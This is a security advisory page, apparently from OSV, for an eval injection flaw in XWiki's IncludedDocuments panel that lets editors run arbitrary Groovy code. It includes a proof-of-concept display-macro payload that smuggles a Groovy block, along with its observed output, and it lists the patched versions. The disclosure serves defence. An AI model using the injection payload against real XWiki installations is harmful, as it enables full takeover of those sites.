Lucene search

K
osvGoogleOSV:GHSA-QX9H-C5V6-GHQH
HistoryApr 12, 2023 - 8:35 p.m.

org.xwiki.platform:xwiki-platform-panels-ui Eval Injection vulnerability

2023-04-1220:35:50
Google
osv.dev
8
xwiki
eval injection
vulnerability
patched
security advisory

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

0.002 Low

EPSS

Percentile

52.9%

Impact

Any user with edit rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the included pages in the IncludedDocuments panel.

Precondition: As an admin, add the Panels.IncludedDocuments panel on one column.

A proof of concept exploit is to edit a document and add the following code before saving.

{{display reference="{{cache~}~}{{groovy~}~}println(~"Hello from Groovy~" + ~" in included document!~"){{/groovy~}~}{{/cache~}~}"/}}

expected
The right had side panels contain:

One included page: 
{{cache}}{{groovy}}println("Hello from Groovy" + " in included document!"){{/groovy}}{{/cache}}

actual
The right had side panels contain:

One included page:
    XWiki.Hello from Groovy in included document!

Patches

The problem has been patched on XWiki 14.4.7, and 14.10.

Workarounds

The issue can be fixed manually applying this patch.

References

For more information

If you have any questions or comments about this advisory:

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

0.002 Low

EPSS

Percentile

52.9%

Related for OSV:GHSA-QX9H-C5V6-GHQH